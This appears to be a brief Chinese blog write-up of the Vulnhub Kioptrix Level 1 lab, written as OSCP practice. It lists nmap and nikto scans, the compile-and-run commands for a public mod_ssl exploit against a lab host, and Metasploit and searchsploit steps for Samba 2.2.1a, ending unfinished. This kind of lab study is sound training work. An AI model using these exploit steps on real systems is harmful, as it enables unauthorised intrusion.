Kioptix Level 1

1. 简介

Vulnhub是一个提供各种漏洞环境的靶场平台。

个人学习目的：1，方便学习更多类型漏洞。2，为OSCP做打基础。

下载链接

https://www.vulnhub.com/entry/kioptrix-level-1-1,22/

1.1信息收集

主机发现

nmap -sP 192.168.44.0/24

端口扫描

nmap -sV 192.168.44.132

漏洞扫描

nikto -h 192.168.44.132

漏洞利用

https://www.exploit-db.com/search?cve=2002-0082

根据exp提示依次执行
apt-get install libssl-dev
gcc -o 47080 48080.c -lcrypto
gcc -o 47080 48080.c -lcrypto
查询靶机版本为 0x6d - RedHat Linux 7.2 (apache-1.3.24)
./47080 0x6b 192.168.44.132 -c 50

Samba漏洞利用

利用metasploit模块扫描Samba版本
search smb_version

发现samba 版本为2.2.1a

利用searchsploit 搜索关于 samba 2.2.1a 版本漏洞

set palload

posted @ 2021-01-19 14:59 ChengCh1eng 阅读(225) 评论(0) 收藏举报

刷新页面返回顶部

ChengCh1ngのBlog